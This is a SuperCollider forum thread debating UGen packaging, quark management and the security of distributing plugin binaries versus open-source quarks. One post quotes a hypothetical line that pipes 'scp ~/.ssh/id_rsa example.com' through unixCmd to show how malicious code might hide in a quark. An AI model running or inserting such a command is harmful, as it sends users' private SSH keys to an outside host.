Moving some SC3Plugins into the "Core"…

… of course, this is up for discussion too. (Probably not here, though!)

This seems like the perfect place to discuss! The question was about moving UGens into core and Scott seemed to indicate his philosophy was to do the opposite: migrate to a smaller core, splitting UGens out intoa Quarks system (Scott, I hope I’m interpreting this correctly/charitably)

In my ideal world “the core” UGens would be very minimal, and installing / swapping out UGen sets for different use cases and projects would be very trivial.

I’d also like it to be super-easy to install a set of UGens! (I probably don’t need to sell you on my use-case of easily getting Ambisonics :slight_smile: ). I see a huge value, though, in having a large common UGen vocabulary across the SC community.

Our other disagreement, if there is one, is about how to achieve easy UGen installs. IMO, in a small community like SC, there needs to be some official curation. The solutions that work for languages with person-centuries invested in their package managers seem inappropriate for us. I’m viewing one or more sets of UGens stamped with “the SC devs stand behind these” as being the (mostly) cheap and (mostly) cheerful solution to the problem.

(As Scott points out, sc3-plugins is a major hodgepoge as well. So there’s no panacea. But we should acknowledge the benfits to a process more similar to the status quo.)

It need a namespace/package system. That and it’s rigid class system system are the two things that annoy me the most about the language.

1 Like

Extensions is a mess. I know nobody wants to ever get rid of stuff in SuperCollier, but my god there are plugins in there that need to moved to a legacy pack or something. The blackrain ones, most of the ‘analog’ filters, etc. Lots of novelty stuff which are great if that’s what you’re looking for, but most of us aren’t…

DMF1 is a really good filter, but how is a user supposed to know that’s the one good filter (or that all the moog filters are bad, and the only decent moog filters are maintained elsewhere).

This viewpoint seems to massively overestimate how hard it is to produce a malicious binary. Someone could modify a UGen to do something malicious in a couple hours. Just two of many possible motives: a person with an unusual sense of humor playing a prank, or a developer who’s angry at someone else in the SC community. Not to mention people who compile using a compromised toolchain, etc.

It’s easy to produce a malicious binary, but it’s sufficient work that nobody’s likely to do it in order to try and make money from an obscure music platform.

I’m more worried by literally everything else I’m using, starting with my phone.

This viewpoint seems to massively overestimate how hard it is to produce a malicious binary. Someone could modify a UGen to do something malicious in a couple hours. Just two of many possible motives: a person with an unusual sense of humor playing a prank, or a developer who’s angry at someone else in the SC community. Not to mention people who compile using a compromised toolchain, etc.

It’s easy to produce a malicious binary, but it’s sufficient work that nobody’s likely to do it in order to try and make money from an obscure music platform.

Neither example I mentioned have money as a motive, and in the case of an honest developer using a compromised toolchain, the malicious developers need not have even heard of Supercollider.

Sclang alone is powerful enough to do all sorts of evil things. Do you check the source code of every Quark you install?

How hard would it be to build a ‘pre-parser’ which traverses a piece of code an tells you which quarks and classes outside of Vanilla SC are being used? The other day I thought I would do some spring-cleaning of installed quarks and I spent a long time trying to figure out which quarks I needed to run my code.

I the perfect world (or my perfect world) this pre-parser would give me the external quarks and classes in a window with the option to expand the view to see the method calls used for each external class or quark. The window would have the one-click option of installing all classes and quarks missing to run the code in question and also the ability to cherry pick which classes and quarks to install. An extra feature could be revealing where in the code (file & linenumber) external methods are used. This way it would be easy to see where methods calls are used across several connected files.

A very basic version would simply give you a list of missing quarks and classes without the automated way or installing them and without the specifics about where in the code methods were called. This would still be very helpful.

1 Like

I have often wondered why LFBrownNoise0, LFBrownNoise1 and LFBrownNoise2 are not included in the core library… It would be cool if there was a way to use alternatives for these three without SC3 plugins.

2 Likes

QuarkEditor (GitHub - scztt/QuarkEditor.quark) does this, to remind you of quarks you are using but have not installed. It’s meant for finding quark dependencies for another quark, but it could easily be adapted to find dependencies for any given piece of code. It doesn’t search for method extensions, as this is a somewhat hopeless task, though there may still be code in there that tries.

2 Likes

Sweet. Could it also be extended to search for external classes?

Not sure exactly what you mean by “external classes”? If you mean classes from quarks that aren’t currently installed - no, it can’t search, because if you don’t have the classes installed then you can’t compile or run sclang at all. The tool is more for taking an existing, running sclang instance and telling you what explicit quark dependencies you have for a given file / set of classes.

Sclang alone is powerful enough to do all sorts of evil things. Do you check the source code of every Quark you install?

Quarks are:

  • open-source
  • have immutable git history and author information
  • have one version for all CPU architectures and OSes
  • are very unlikely to accidentally be injected with malicious code
  • actually can be vetted, and are inspected regularly, even if not by every user

Binaries are:

  • closed-source
  • don’t necessarily have history or author information
  • are different for every OS+architecture pair
  • more likely to accidentally contain something malicious
    • so additionally they have plausible deniability (“I didn’t do it, it was my toolchain”)
  • typically never inspected, and even if someone were to spend a huge amount of time verifying a binary for a given OS+arch pair, their effort would say nothing about any other pair, or any other version of a pair
    • in the worst case, we don’t necessarily know that 2 downloads of the “same” binary have the same contents

So for Quarks there’s value in reputational risks and community vetting, as opposed to each person verifying every Quark 100%. E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark it would be likely to be discovered at some point and have great reputational cost for him.

On the other hand, we already have examples of third parties distributing malicious Windows binaries of SuperCollider on third-party sites.

But yes, if the Quarks browser searched the open internet, or if I got a Quark or .scd file in my email from a stranger, I wouldn’t just run it without reading the source, and neither should anyone else.

1 Like

Aren’t UGens, in general, simple enough for a package manager to simply compile locally? Too much to ask a user?

The level of sophistication injecting backdoors, even via utils, is now unprecedented. That’s why a controlled build environment makes much more sense now than ever before.

I know, unlikely to happen in this community or PD, but everything is unthinkable until it happens anyway. And it can happen without malicious intention by the uploader.

(Of course, using proprietary software, you have that already for free.)

E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark it would be likely to be discovered at some point and have great reputational cost for him.

So you trust his source code, but wouldn’t trust his binaries?

But yes, if the Quarks browser searched the open internet,

That’s of course not how package managers work. In the case of Pd’s Deken package manager, all libraries/externals are stored on a central server (which is hosted at the IEM in Graz). If someone wants to upload a package, they need to register for an account with their e-mail address. Users can see when and by whom a package has been uploaded.


You’re not wrong about the potential security risks of binaries. However, there is a general trade-off between security and convenience. Many users (including myself) are happy to trade some security for convenience.

Reality #1: Audio plugins are generally distributed in binary form. You simply can’t expect casual users to manually build plugins from source.

Reality #2: sc3plugins model is not sustainable and as consequence the repo has been effectively frozen. There are still occasional bug fixes, but I think it will not accept new plugins. AFAICT, the last new plugin has been added 6 years ago. This means that all new plugins must be distributed by the authors themselves.

In practice, UGen plugins are already distributed in binary form. People who want to use VSTPlugin or Flucoma need to find the website and download the binaries. (Again, only few users are capable/willing to build from source.)

Adding binary support to the Quarks system would finally provide a unified distribution channel. IMO it would be a clear win for both users and plugin authors over the current situation. Of course, there are some technical and logistic questions to be solved, most importantly where and how to host the binaries.

Also, please note that source code and binaries are not mutually exclusive! For example, Pd encourages packagers to also ship the source code along with the binaries. This way people who don’t want to download binaries can build from source instead.


Side note: Pd’s Deken package manager has been developed and is being maintained by IOhannes zmoelnig. His is, among many other things, sysadmin at the IEM and the Debian packager for Pure Data. He is well aware of all the potential security issues, but he – and the Pd community as a whole – thinks that the benefits outweight the risks. I would really encourage everyone interested in this topic to have a deeper look.

I’m not saying that the SC community necessarily needs to come to the same conclusions, but I just wanted to challenge the somewhat negative views towards binary distribution.

2 Likes

See also Plugins.quark: A package manager for installing plugins

2 Likes

Very unlikely, but in theory without an isolated building environment, he can upload malicious software without intent.

When I used arch, I was pleased that things were much looser in this respect (especially AUR builds). But after the xz backdoor, I think ArchLinux would be the first to spread the backdoor, or some other malicious engineering with that level of sophistication.

I will, and I see your point clearly. But I think PD needs much more work in this respect, and at the end of the day, it’s the user who should make an informed decision.

info xz-utils backdoor situation (CVE-2024-3094) · GitHub

Arch installs binaries. They’re signed, but that wouldn’t protect you from the hypothetical threat above. Most of the computing world relies upon binaries compiled by someone else.

I think people should have the option to compile from source if they want to, and binaries should be signed, but that’s about the limit that’s practical. There are source based Unixes (Gentoo, some of the BSDs support this), but most people don’t use them because it takes so long to compile packages.

2 Likes